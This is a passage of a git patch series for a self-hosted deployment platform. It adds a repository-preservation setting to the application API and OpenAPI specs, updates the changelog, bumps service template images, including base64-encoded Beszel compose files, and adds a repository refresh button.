                             'is_container_label_escape_enabled' => ['type' => 'boolean', 'default' => true, 'description' => 'Escape special characters in labels. By default, $ (and other chars) is escaped. So if you write $ in the labels, it will be saved as $$. If you want to use env variables inside the labels, turn this off.'],
+                            'is_preserve_repository_enabled' => ['type' => 'boolean', 'default' => false, 'description' => 'Preserve repository during deployment.'],
                         ],
                     )
                 ),
@@ -556,6 +558,7 @@ public function create_private_gh_app_application(Request $request)
                             'force_domain_override' => ['type' => 'boolean', 'description' => 'Force domain usage even if conflicts are detected. Default is false.'],
                             'autogenerate_domain' => ['type' => 'boolean', 'default' => true, 'description' => 'If true and domains is empty, auto-generate a domain using the server\'s wildcard domain or sslip.io fallback. Default: true.'],
                             'is_container_label_escape_enabled' => ['type' => 'boolean', 'default' => true, 'description' => 'Escape special characters in labels. By default, $ (and other chars) is escaped. So if you write $ in the labels, it will be saved as $$. If you want to use env variables inside the labels, turn this off.'],
+                            'is_preserve_repository_enabled' => ['type' => 'boolean', 'default' => false, 'description' => 'Preserve repository during deployment.'],
                         ],
                     )
                 ),
@@ -1002,7 +1005,7 @@ private function create_application(Request $request, $type)
         if ($return instanceof \Illuminate\Http\JsonResponse) {
             return $return;
         }
-        $allowedFields = ['project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'type', 'name', 'description', 'is_static', 'is_spa', 'is_auto_deploy_enabled', 'is_force_https_enabled', 'domains', 'git_repository', 'git_branch', 'git_commit_sha', 'private_key_uuid', 'docker_registry_image_name', 'docker_registry_image_tag', 'build_pack', 'install_command', 'build_command', 'start_command', 'ports_exposes', 'ports_mappings', 'custom_network_aliases', 'base_directory', 'publish_directory', 'health_check_enabled', 'health_check_path', 'health_check_port', 'health_check_host', 'health_check_method', 'health_check_return_code', 'health_check_scheme', 'health_check_response_text', 'health_check_interval', 'health_check_timeout', 'health_check_retries', 'health_check_start_period', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'custom_labels', 'custom_docker_run_options', 'post_deployment_command', 'post_deployment_command_container', 'pre_deployment_command', 'pre_deployment_command_container',  'manual_webhook_secret_github', 'manual_webhook_secret_gitlab', 'manual_webhook_secret_bitbucket', 'manual_webhook_secret_gitea', 'redirect', 'github_app_uuid', 'instant_deploy', 'dockerfile', 'dockerfile_location', 'docker_compose_location', 'docker_compose_raw', 'docker_compose_custom_start_command', 'docker_compose_custom_build_command', 'docker_compose_domains', 'watch_paths', 'use_build_server', 'static_image', 'custom_nginx_configuration', 'is_http_basic_auth_enabled', 'http_basic_auth_username', 'http_basic_auth_password', 'connect_to_docker_network', 'force_domain_override', 'autogenerate_domain', 'is_container_label_escape_enabled'];
+        $allowedFields = ['project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'type', 'name', 'description', 'is_static', 'is_spa', 'is_auto_deploy_enabled', 'is_force_https_enabled', 'domains', 'git_repository', 'git_branch', 'git_commit_sha', 'private_key_uuid', 'docker_registry_image_name', 'docker_registry_image_tag', 'build_pack', 'install_command', 'build_command', 'start_command', 'ports_exposes', 'ports_mappings', 'custom_network_aliases', 'base_directory', 'publish_directory', 'health_check_enabled', 'health_check_path', 'health_check_port', 'health_check_host', 'health_check_method', 'health_check_return_code', 'health_check_scheme', 'health_check_response_text', 'health_check_interval', 'health_check_timeout', 'health_check_retries', 'health_check_start_period', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'custom_labels', 'custom_docker_run_options', 'post_deployment_command', 'post_deployment_command_container', 'pre_deployment_command', 'pre_deployment_command_container',  'manual_webhook_secret_github', 'manual_webhook_secret_gitlab', 'manual_webhook_secret_bitbucket', 'manual_webhook_secret_gitea', 'redirect', 'github_app_uuid', 'instant_deploy', 'dockerfile', 'dockerfile_location', 'docker_compose_location', 'docker_compose_raw', 'docker_compose_custom_start_command', 'docker_compose_custom_build_command', 'docker_compose_domains', 'watch_paths', 'use_build_server', 'static_image', 'custom_nginx_configuration', 'is_http_basic_auth_enabled', 'http_basic_auth_username', 'http_basic_auth_password', 'connect_to_docker_network', 'force_domain_override', 'autogenerate_domain', 'is_container_label_escape_enabled', 'is_preserve_repository_enabled'];
 
         $validator = customApiValidator($request->all(), [
             'name' => 'string|max:255',
@@ -1051,6 +1054,7 @@ private function create_application(Request $request, $type)
         $connectToDockerNetwork = $request->connect_to_docker_network;
         $customNginxConfiguration = $request->custom_nginx_configuration;
         $isContainerLabelEscapeEnabled = $request->boolean('is_container_label_escape_enabled', true);
+        $isPreserveRepositoryEnabled = $request->boolean('is_preserve_repository_enabled',false);
 
         if (! is_null($customNginxConfiguration)) {
             if (! isBase64Encoded($customNginxConfiguration)) {
@@ -1253,6 +1257,10 @@ private function create_application(Request $request, $type)
                 $application->settings->is_container_label_escape_enabled = $isContainerLabelEscapeEnabled;
                 $application->settings->save();
             }
+            if (isset($isPreserveRepositoryEnabled)) {
+                $application->settings->is_preserve_repository_enabled = $isPreserveRepositoryEnabled;
+                $application->settings->save();
+            }
             $application->refresh();
             // Auto-generate domain if requested and no custom domain provided
             if ($autogenerateDomain && blank($fqdn)) {
@@ -1486,6 +1494,10 @@ private function create_application(Request $request, $type)
                 $application->settings->is_container_label_escape_enabled = $isContainerLabelEscapeEnabled;
                 $application->settings->save();
             }
+            if (isset($isPreserveRepositoryEnabled)) {
+                $application->settings->is_preserve_repository_enabled = $isPreserveRepositoryEnabled;
+                $application->settings->save();
+            }
             if ($application->settings->is_container_label_readonly_enabled) {
                 $application->custom_labels = str(implode('|coolify|', generateLabelsApplication($application)))->replace('|coolify|', "\n");
                 $application->save();
@@ -1683,6 +1695,10 @@ private function create_application(Request $request, $type)
                 $application->settings->is_container_label_escape_enabled = $isContainerLabelEscapeEnabled;
                 $application->settings->save();
             }
+            if (isset($isPreserveRepositoryEnabled)) {
+                $application->settings->is_preserve_repository_enabled = $isPreserveRepositoryEnabled;
+                $application->settings->save();
+            }
             if ($application->settings->is_container_label_readonly_enabled) {
                 $application->custom_labels = str(implode('|coolify|', generateLabelsApplication($application)))->replace('|coolify|', "\n");
                 $application->save();
@@ -2378,6 +2394,7 @@ public function delete_by_uuid(Request $request)
                             'connect_to_docker_network' => ['type' => 'boolean', 'description' => 'The flag to connect the service to the predefined Docker network.'],
                             'force_domain_override' => ['type' => 'boolean', 'description' => 'Force domain usage even if conflicts are detected. Default is false.'],
                             'is_container_label_escape_enabled' => ['type' => 'boolean', 'default' => true, 'description' => 'Escape special characters in labels. By default, $ (and other chars) is escaped. So if you write $ in the labels, it will be saved as $$. If you want to use env variables inside the labels, turn this off.'],
+                            'is_preserve_repository_enabled' => ['type' => 'boolean', 'description' => 'Preserve git repository during application update. If false, the existing repository will be removed and replaced with the new one. If true, the existing repository will be kept and the new one will be ignored. Default is false.'],
                         ],
                     )
                 ),
@@ -2463,7 +2480,7 @@ public function update_by_uuid(Request $request)
         $this->authorize('update', $application);
 
         $server = $application->destination->server;
-        $allowedFields = ['name', 'description', 'is_static', 'is_spa', 'is_auto_deploy_enabled', 'is_force_https_enabled', 'domains', 'git_repository', 'git_branch', 'git_commit_sha', 'docker_registry_image_name', 'docker_registry_image_tag', 'build_pack', 'static_image', 'install_command', 'build_command', 'start_command', 'ports_exposes', 'ports_mappings', 'custom_network_aliases', 'base_directory', 'publish_directory', 'health_check_enabled', 'health_check_path', 'health_check_port', 'health_check_host', 'health_check_method', 'health_check_return_code', 'health_check_scheme', 'health_check_response_text', 'health_check_interval', 'health_check_timeout', 'health_check_retries', 'health_check_start_period', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'custom_labels', 'custom_docker_run_options', 'post_deployment_command', 'post_deployment_command_container', 'pre_deployment_command', 'pre_deployment_command_container', 'watch_paths', 'manual_webhook_secret_github', 'manual_webhook_secret_gitlab', 'manual_webhook_secret_bitbucket', 'manual_webhook_secret_gitea', 'dockerfile_location', 'docker_compose_location', 'docker_compose_custom_start_command', 'docker_compose_custom_build_command', 'docker_compose_domains', 'redirect', 'instant_deploy', 'use_build_server', 'custom_nginx_configuration', 'is_http_basic_auth_enabled', 'http_basic_auth_username', 'http_basic_auth_password', 'connect_to_docker_network', 'force_domain_override', 'is_container_label_escape_enabled'];
+        $allowedFields = ['name', 'description', 'is_static', 'is_spa', 'is_auto_deploy_enabled', 'is_force_https_enabled', 'domains', 'git_repository', 'git_branch', 'git_commit_sha', 'docker_registry_image_name', 'docker_registry_image_tag', 'build_pack', 'static_image', 'install_command', 'build_command', 'start_command', 'ports_exposes', 'ports_mappings', 'custom_network_aliases', 'base_directory', 'publish_directory', 'health_check_enabled', 'health_check_path', 'health_check_port', 'health_check_host', 'health_check_method', 'health_check_return_code', 'health_check_scheme', 'health_check_response_text', 'health_check_interval', 'health_check_timeout', 'health_check_retries', 'health_check_start_period', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'custom_labels', 'custom_docker_run_options', 'post_deployment_command', 'post_deployment_command_container', 'pre_deployment_command', 'pre_deployment_command_container', 'watch_paths', 'manual_webhook_secret_github', 'manual_webhook_secret_gitlab', 'manual_webhook_secret_bitbucket', 'manual_webhook_secret_gitea', 'dockerfile_location', 'docker_compose_location', 'docker_compose_custom_start_command', 'docker_compose_custom_build_command', 'docker_compose_domains', 'redirect', 'instant_deploy', 'use_build_server', 'custom_nginx_configuration', 'is_http_basic_auth_enabled', 'http_basic_auth_username', 'http_basic_auth_password', 'connect_to_docker_network', 'force_domain_override', 'is_container_label_escape_enabled', 'is_preserve_repository_enabled'];
 
         $validationRules = [
             'name' => 'string|max:255',
@@ -2713,7 +2730,7 @@ public function update_by_uuid(Request $request)
         $connectToDockerNetwork = $request->connect_to_docker_network;
         $useBuildServer = $request->use_build_server;
         $isContainerLabelEscapeEnabled = $request->boolean('is_container_label_escape_enabled');
-
+        $isPreserveRepositoryEnabled = $request->boolean('is_preserve_repository_enabled');
         if (isset($useBuildServer)) {
             $application->settings->is_build_server_enabled = $useBuildServer;
             $application->settings->save();
@@ -2748,7 +2765,10 @@ public function update_by_uuid(Request $request)
             $application->settings->is_container_label_escape_enabled = $isContainerLabelEscapeEnabled;
             $application->settings->save();
         }
-
+        if ($request->has('is_preserve_repository_enabled')) {
+            $application->settings->is_preserve_repository_enabled = $isPreserveRepositoryEnabled;
+            $application->settings->save();
+        }
         removeUnnecessaryFieldsFromRequest($request);
 
         $data = $request->all();

From 53c1d5bcbb41bd03684b9ca4ae1f2e3a57a0dfca Mon Sep 17 00:00:00 2001
From: Ahmed <ahmadameer167@gmail.com>
Date: Sun, 15 Feb 2026 22:24:41 +0300
Subject: [PATCH 017/213] feat: add 'is_preserve_repository_enabled' field to
 shared data applications and remove from request

---
 bootstrap/helpers/api.php | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/bootstrap/helpers/api.php b/bootstrap/helpers/api.php
index d5c2c996b..da2eb6f21 100644
--- a/bootstrap/helpers/api.php
+++ b/bootstrap/helpers/api.php
@@ -139,6 +139,7 @@ function sharedDataApplications()
         'docker_compose_custom_start_command' => 'string|nullable',
         'docker_compose_custom_build_command' => 'string|nullable',
         'is_container_label_escape_enabled' => 'boolean',
+        'is_preserve_repository_enabled' => 'boolean'
     ];
 }
 
@@ -188,5 +189,6 @@ function removeUnnecessaryFieldsFromRequest(Request $request)
     $request->offsetUnset('force_domain_override');
     $request->offsetUnset('autogenerate_domain');
     $request->offsetUnset('is_container_label_escape_enabled');
+    $request->offsetUnset('is_preserve_repository_enabled');
     $request->offsetUnset('docker_compose_raw');
 }

From 20563e23ff338cdf7e288ee217f32b4ffaac21c8 Mon Sep 17 00:00:00 2001
From: Ahmed <ahmadameer167@gmail.com>
Date: Sun, 15 Feb 2026 22:53:26 +0300
Subject: [PATCH 018/213] feat: add 'is_preserve_repository_enabled' field to
 openapi specifications for deployment

---
 openapi.json | 20 ++++++++++++++++++++
 openapi.yaml | 16 ++++++++++++++++
 2 files changed, 36 insertions(+)

diff --git a/openapi.json b/openapi.json
index bd502865a..a9e16ca55 100644
--- a/openapi.json
+++ b/openapi.json
@@ -407,6 +407,11 @@
                                         "type": "boolean",
                                         "default": true,
                                         "description": "Escape special characters in labels. By default, $ (and other chars) is escaped. So if you write $ in the labels, it will be saved as $$. If you want to use env variables inside the labels, turn this off."
+                                    },
+                                    "is_preserve_repository_enabled": {
+                                        "type": "boolean",
+                                        "default": false,
+                                        "description": "Preserve repository during deployment."
                                     }
                                 },
                                 "type": "object"
@@ -852,6 +857,11 @@
                                         "type": "boolean",
                                         "default": true,
                                         "description": "Escape special characters in labels. By default, $ (and other chars) is escaped. So if you write $ in the labels, it will be saved as $$. If you want to use env variables inside the labels, turn this off."
+                                    },
+                                    "is_preserve_repository_enabled": {
+                                        "type": "boolean",
+                                        "default": false,
+                                        "description": "Preserve repository during deployment."
                                     }
                                 },
                                 "type": "object"
@@ -1297,6 +1307,11 @@
                                         "type": "boolean",
                                         "default": true,
                                         "description": "Escape special characters in labels. By default, $ (and other chars) is escaped. So if you write $ in the labels, it will be saved as $$. If you want to use env variables inside the labels, turn this off."
+                                    },
+                                    "is_preserve_repository_enabled": {
+                                        "type": "boolean",
+                                        "default": false,
+                                        "description": "Preserve repository during deployment."
                                     }
                                 },
                                 "type": "object"
@@ -2704,6 +2719,11 @@
                                         "type": "boolean",
                                         "default": true,
                                         "description": "Escape special characters in labels. By default, $ (and other chars) is escaped. So if you write $ in the labels, it will be saved as $$. If you want to use env variables inside the labels, turn this off."
+                                    },
+                                    "is_preserve_repository_enabled": {
+                                        "type": "boolean",
+                                        "default": false,
+                                        "description": "Preserve repository during deployment."
                                     }
                                 },
                                 "type": "object"
diff --git a/openapi.yaml b/openapi.yaml
index 11148f43b..79ad73320 100644
--- a/openapi.yaml
+++ b/openapi.yaml
@@ -291,6 +291,10 @@ paths:
                   type: boolean
                   default: true
                   description: 'Escape special characters in labels. By default, $ (and other chars) is escaped. So if you write $ in the labels, it will be saved as $$. If you want to use env variables inside the labels, turn this off.'
+                is_preserve_repository_enabled:
+                  type: boolean
+                  default: false
+                  description: 'Preserve repository during deployment.'
               type: object
       responses:
         '201':
@@ -575,6 +579,10 @@ paths:
                   type: boolean
                   default: true
                   description: 'Escape special characters in labels. By default, $ (and other chars) is escaped. So if you write $ in the labels, it will be saved as $$. If you want to use env variables inside the labels, turn this off.'
+                is_preserve_repository_enabled:
+                  type: boolean
+                  default: false
+                  description: 'Preserve repository during deployment.'
               type: object
       responses:
         '201':
@@ -859,6 +867,10 @@ paths:
                   type: boolean
                   default: true
                   description: 'Escape special characters in labels. By default, $ (and other chars) is escaped. So if you write $ in the labels, it will be saved as $$. If you want to use env variables inside the labels, turn this off.'
+                is_preserve_repository_enabled:
+                  type: boolean
+                  default: false
+                  description: 'Preserve repository during deployment.'
               type: object
       responses:
         '201':
@@ -1741,6 +1753,10 @@ paths:
                   type: boolean
                   default: true
                   description: 'Escape special characters in labels. By default, $ (and other chars) is escaped. So if you write $ in the labels, it will be saved as $$. If you want to use env variables inside the labels, turn this off.'
+                is_preserve_repository_enabled:
+                  type: boolean
+                  default: false
+                  description: 'Preserve repository during deployment.'
               type: object
       responses:
         '200':

From 17f5259f3238c269e5aa2c3fde116050967c7675 Mon Sep 17 00:00:00 2001
From: "github-actions[bot]" <github-actions[bot]@users.noreply.github.com>
Date: Mon, 16 Feb 2026 08:32:31 +0000
Subject: [PATCH 019/213] docs: update changelog

---
 CHANGELOG.md | 13 +++++++++++++
 1 file changed, 13 insertions(+)

diff --git a/CHANGELOG.md b/CHANGELOG.md
index 223fad638..21d6da7cd 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4508,6 +4508,12 @@ ### 🐛 Bug Fixes
 - *(api-docs)* Use proper schema references for environment variable endpoints (#8239)
 - *(ui)* Fix datalist border color and add repository selection watcher (#8240)
 - *(server)* Improve IP uniqueness validation with team-specific error messages
+- *(jobs)* Initialize status variable in checkHetznerStatus (#8359)
+- *(jobs)* Handle queue timeouts gracefully in Horizon (#8360)
+- *(push-server-job)* Skip containers with empty service subId (#8361)
+- *(database)* Disable proxy on port allocation failure (#8362)
+- *(sentry)* Use withScope for SSH retry event tracking (#8363)
+- *(api)* Add a newline to openapi.json
 
 ### 💼 Other
 
@@ -5599,6 +5605,7 @@ ### 🚜 Refactor
 - *(api)* Update application create endpoints docs
 - *(api)* Application urls validation
 - *(services)* Improve some service slogans
+- *(ssh-retry)* Remove Sentry tracking from retry logic
 
 ### 📚 Documentation
 
@@ -5743,6 +5750,7 @@ ### 📚 Documentation
 - *(api)* Improve app endpoint deprecation description
 - Add Coolify design system reference
 - Add Coolify design system reference (#8237)
+- Update changelog
 
 ### ⚡ Performance
 
@@ -6506,6 +6514,11 @@ ### ⚙️ Miscellaneous Tasks
 - Bump coolify version
 - Prepare for PR
 - Prepare for PR
+- Prepare for PR
+- Prepare for PR
+- Prepare for PR
+- Prepare for PR
+- Prepare for PR
 
 ### ◀️ Revert
 

From 7c4f8f37a360c50795a154411c12610d370e021a Mon Sep 17 00:00:00 2001
From: "github-actions[bot]" <github-actions[bot]@users.noreply.github.com>
Date: Tue, 17 Feb 2026 11:24:33 +0000
Subject: [PATCH 020/213] docs: update changelog

---
 CHANGELOG.md | 14 ++++++++++++++
 1 file changed, 14 insertions(+)

diff --git a/CHANGELOG.md b/CHANGELOG.md
index 21d6da7cd..026dec470 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4514,6 +4514,9 @@ ### 🐛 Bug Fixes
 - *(database)* Disable proxy on port allocation failure (#8362)
 - *(sentry)* Use withScope for SSH retry event tracking (#8363)
 - *(api)* Add a newline to openapi.json
+- *(server)* Improve IP uniqueness validation with team-specific error messages
+- *(service)* Glitchtip webdashboard doesn't load
+- *(service)* Glitchtip webdashboard doesn't load (#8249)
 
 ### 💼 Other
 
@@ -5606,6 +5609,7 @@ ### 🚜 Refactor
 - *(api)* Application urls validation
 - *(services)* Improve some service slogans
 - *(ssh-retry)* Remove Sentry tracking from retry logic
+- *(ssh-retry)* Remove Sentry tracking from retry logic
 
 ### 📚 Documentation
 
@@ -5751,6 +5755,7 @@ ### 📚 Documentation
 - Add Coolify design system reference
 - Add Coolify design system reference (#8237)
 - Update changelog
+- Update changelog
 
 ### ⚡ Performance
 
@@ -5789,6 +5794,9 @@ ### 🧪 Testing
 - Add tests for shared environment variable spacing and resolution
 - Add comprehensive preview deployment port and path tests
 - Add comprehensive preview deployment port and path tests (#7677)
+- Add Pest browser testing with SQLite :memory: schema
+- Add dashboard test and improve browser test coverage
+- Migrate to SQLite :memory: and add Pest browser testing (#8364)
 
 ### ⚙️ Miscellaneous Tasks
 
@@ -6519,6 +6527,12 @@ ### ⚙️ Miscellaneous Tasks
 - Prepare for PR
 - Prepare for PR
 - Prepare for PR
+- Prepare for PR
+- Prepare for PR
+- Prepare for PR
+- Prepare for PR
+- Prepare for PR
+- Prepare for PR
 
 ### ◀️ Revert
 

From 7ad6bbafcd886ab51cb4a0cd23d587f53eb09136 Mon Sep 17 00:00:00 2001
From: Firu <105530193+Luzefiru@users.noreply.github.com>
Date: Tue, 24 Feb 2026 11:25:17 +0800
Subject: [PATCH 021/213] chore(templates): bump databasus image version

---
 templates/compose/databasus.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/templates/compose/databasus.yaml b/templates/compose/databasus.yaml
index fccb81f4d..f670aad8a 100644
--- a/templates/compose/databasus.yaml
+++ b/templates/compose/databasus.yaml
@@ -7,7 +7,7 @@
 
 services:
   databasus:
-    image: 'databasus/databasus:v2.18.0' # Released on 28 Dec, 2025
+    image: 'databasus/databasus:v3.16.2' # Released on 23 February, 2026
     environment:
       - SERVICE_URL_DATABASUS_4005
     volumes:

From b71ad865dc2777ef7184d6e02be1db0ca91963ff Mon Sep 17 00:00:00 2001
From: Aditya Tripathi <aditya@climactic.co>
Date: Wed, 25 Feb 2026 11:39:43 +0000
Subject: [PATCH 022/213] feat: refresh private repository if updating

---
 .../new/github-private-repository.blade.php   |  19 ++-
 templates/service-templates-latest.json       |  57 +-------
 templates/service-templates.json              |  57 +-------
 tests/Feature/GithubPrivateRepositoryTest.php | 126 ++++++++++++++++++
 4 files changed, 145 insertions(+), 114 deletions(-)
 create mode 100644 tests/Feature/GithubPrivateRepositoryTest.php

diff --git a/resources/views/livewire/project/new/github-private-repository.blade.php b/resources/views/livewire/project/new/github-private-repository.blade.php
index 129c508a9..27ef6a189 100644
--- a/resources/views/livewire/project/new/github-private-repository.blade.php
+++ b/resources/views/livewire/project/new/github-private-repository.blade.php
@@ -4,16 +4,27 @@
         <x-modal-input buttonTitle="+ Add GitHub App" title="New GitHub App" closeOutside="false">
             <livewire:source.github.create />
         </x-modal-input>
-        @if ($repositories->count() > 0)
+    </div>
+    <div class="pb-4">Deploy any public or private Git repositories through a GitHub App.</div>
+    @if ($repositories->count() > 0)
+        <div class="flex items-center gap-2 pb-4">
             <a target="_blank" class="flex hover:no-underline" href="{{ getInstallationPath($github_app) }}">
                 <x-forms.button>
                     Change Repositories on GitHub
                     <x-external-link />
                 </x-forms.button>
             </a>
-        @endif
-    </div>
-    <div class="pb-4">Deploy any public or private Git repositories through a GitHub App.</div>
+            <x-forms.button :showLoadingIndicator="false" wire:click.prevent="loadRepositories({{ $github_app->id }})" title="Refresh Repository List">
+                <svg class="w-4 h-4" wire:loading.remove wire:target="loadRepositories({{ $github_app->id }})" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="1.5" stroke="currentColor">
+                    <path stroke-linecap="round" stroke-linejoin="round" d="M16.023 9.348h4.992v-.001M2.985 19.644v-4.992m0 0h4.992m-4.993 0 3.181 3.183a8.25 8.25 0 0 0 13.803-3.7M4.031 9.865a8.25 8.25 0 0 1 13.803-3.7l3.181 3.182m0-4.991v4.99" />
+                </svg>
+                <svg class="w-4 h-4 animate-spin" wire:loading wire:target="loadRepositories({{ $github_app->id }})" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24">
+                    <circle class="opacity-25" cx="12" cy="12" r="10" stroke="currentColor" stroke-width="4"></circle>
+                    <path class="opacity-75" fill="currentColor" d="M4 12a8 8 0 018-8V0C5.373 0 0 5.373 0 12h4zm2 5.291A7.962 7.962 0 014 12H0c0 3.042 1.135 5.824 3 7.938l3-2.647z"></path>
+                </svg>
+            </x-forms.button>
+        </div>
+    @endif
     @if ($github_apps->count() !== 0)
         <div class="flex flex-col gap-2">
             @if ($current_step === 'github_apps')
diff --git a/templates/service-templates-latest.json b/templates/service-templates-latest.json
index 832899a70..a9f653460 100644
--- a/templates/service-templates-latest.json
+++ b/templates/service-templates-latest.json
@@ -254,7 +254,7 @@
     "beszel-agent": {
         "documentation": "https://www.beszel.dev/guide/agent-installation?utm_source=coolify.io",
         "slogan": "Monitoring agent for Beszel",
-        "compose": "c2VydmljZXM6CiAgYmVzemVsLWFnZW50OgogICAgaW1hZ2U6ICdoZW5yeWdkL2Jlc3plbC1hZ2VudDowLjE2LjEnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBMSVNURU49L2Jlc3plbF9zb2NrZXQvYmVzemVsLnNvY2sKICAgICAgLSAnSFVCX1VSTD0ke0hVQl9VUkw/fScKICAgICAgLSAnVE9LRU49JHtUT0tFTj99JwogICAgICAtICdLRVk9JHtLRVk/fScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2Jlc3plbF9hZ2VudF9kYXRhOi92YXIvbGliL2Jlc3plbC1hZ2VudCcKICAgICAgLSAnYmVzemVsX3NvY2tldDovYmVzemVsX3NvY2tldCcKICAgICAgLSAnL3Zhci9ydW4vZG9ja2VyLnNvY2s6L3Zhci9ydW4vZG9ja2VyLnNvY2s6cm8nCg==",
+        "compose": "c2VydmljZXM6CiAgYmVzemVsLWFnZW50OgogICAgaW1hZ2U6ICdoZW5yeWdkL2Jlc3plbC1hZ2VudDowLjE4LjQnCiAgICBuZXR3b3JrX21vZGU6IGhvc3QKICAgIGVudmlyb25tZW50OgogICAgICAtIExJU1RFTj0vYmVzemVsX3NvY2tldC9iZXN6ZWwuc29jawogICAgICAtIEhVQl9VUkw9JFNFUlZJQ0VfVVJMX0JFU1pFTAogICAgICAtICdUT0tFTj0ke1RPS0VOfScKICAgICAgLSAnS0VZPSR7S0VZfScKICAgICAgLSAnRElTQUJMRV9TU0g9JHtESVNBQkxFX1NTSDotZmFsc2V9JwogICAgICAtICdMT0dfTEVWRUw9JHtMT0dfTEVWRUw6LXdhcm59JwogICAgICAtICdTS0lQX0dQVT0ke1NLSVBfR1BVOi1mYWxzZX0nCiAgICAgIC0gJ1NZU1RFTV9OQU1FPSR7U1lTVEVNX05BTUV9JwogICAgdm9sdW1lczoKICAgICAgLSAnYmVzemVsX2FnZW50X2RhdGE6L3Zhci9saWIvYmVzemVsLWFnZW50JwogICAgICAtICdiZXN6ZWxfc29ja2V0Oi9iZXN6ZWxfc29ja2V0JwogICAgICAtICcvdmFyL3J1bi9kb2NrZXIuc29jazovdmFyL3J1bi9kb2NrZXIuc29jazpybycKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSAvYWdlbnQKICAgICAgICAtIGhlYWx0aAogICAgICBpbnRlcnZhbDogNjBzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAogICAgICBzdGFydF9wZXJpb2Q6IDVzCg==",
         "tags": [
             "beszel",
             "monitoring",
@@ -269,7 +269,7 @@
     "beszel": {
         "documentation": "https://github.com/henrygd/beszel?tab=readme-ov-file#getting-started?utm_source=coolify.io",
         "slogan": "A lightweight server resource monitoring hub with historical data, docker stats, and alerts.",
-        "compose": "c2VydmljZXM6CiAgYmVzemVsOgogICAgaW1hZ2U6ICdoZW5yeWdkL2Jlc3plbDowLjE2LjEnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX1VSTF9CRVNaRUxfODA5MAogICAgdm9sdW1lczoKICAgICAgLSAnYmVzemVsX2RhdGE6L2Jlc3plbF9kYXRhJwogICAgICAtICdiZXN6ZWxfc29ja2V0Oi9iZXN6ZWxfc29ja2V0JwogIGJlc3plbC1hZ2VudDoKICAgIGltYWdlOiAnaGVucnlnZC9iZXN6ZWwtYWdlbnQ6MC4xNi4xJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gTElTVEVOPS9iZXN6ZWxfc29ja2V0L2Jlc3plbC5zb2NrCiAgICAgIC0gJ0hVQl9VUkw9aHR0cDovL2Jlc3plbDo4MDkwJwogICAgICAtICdUT0tFTj0ke1RPS0VOfScKICAgICAgLSAnS0VZPSR7S0VZfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2Jlc3plbF9hZ2VudF9kYXRhOi92YXIvbGliL2Jlc3plbC1hZ2VudCcKICAgICAgLSAnYmVzemVsX3NvY2tldDovYmVzemVsX3NvY2tldCcKICAgICAgLSAnL3Zhci9ydW4vZG9ja2VyLnNvY2s6L3Zhci9ydW4vZG9ja2VyLnNvY2s6cm8nCg==",
+        "compose": "c2VydmljZXM6CiAgYmVzemVsOgogICAgaW1hZ2U6ICdoZW5yeWdkL2Jlc3plbDowLjE4LjQnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX1VSTF9CRVNaRUxfODA5MAogICAgICAtICdDT05UQUlORVJfREVUQUlMUz0ke0NPTlRBSU5FUl9ERVRBSUxTOi10cnVlfScKICAgICAgLSAnU0hBUkVfQUxMX1NZU1RFTVM9JHtTSEFSRV9BTExfU1lTVEVNUzotZmFsc2V9JwogICAgdm9sdW1lczoKICAgICAgLSAnYmVzemVsX2RhdGE6L2Jlc3plbF9kYXRhJwogICAgICAtICdiZXN6ZWxfc29ja2V0Oi9iZXN6ZWxfc29ja2V0JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIC9iZXN6ZWwKICAgICAgICAtIGhlYWx0aAogICAgICAgIC0gJy0tdXJsJwogICAgICAgIC0gJ2h0dHA6Ly9sb2NhbGhvc3Q6ODA5MCcKICAgICAgaW50ZXJ2YWw6IDMwcwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAKICAgICAgc3RhcnRfcGVyaW9kOiA1cwogIGJlc3plbC1hZ2VudDoKICAgIGltYWdlOiAnaGVucnlnZC9iZXN6ZWwtYWdlbnQ6MC4xOC40JwogICAgbmV0d29ya19tb2RlOiBob3N0CiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBMSVNURU49L2Jlc3plbF9zb2NrZXQvYmVzemVsLnNvY2sKICAgICAgLSBIVUJfVVJMPSRTRVJWSUNFX1VSTF9CRVNaRUwKICAgICAgLSAnVE9LRU49JHtUT0tFTn0nCiAgICAgIC0gJ0tFWT0ke0tFWX0nCiAgICAgIC0gJ0RJU0FCTEVfU1NIPSR7RElTQUJMRV9TU0g6LWZhbHNlfScKICAgICAgLSAnTE9HX0xFVkVMPSR7TE9HX0xFVkVMOi13YXJufScKICAgICAgLSAnU0tJUF9HUFU9JHtTS0lQX0dQVTotZmFsc2V9JwogICAgICAtICdTWVNURU1fTkFNRT0ke1NZU1RFTV9OQU1FfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2Jlc3plbF9hZ2VudF9kYXRhOi92YXIvbGliL2Jlc3plbC1h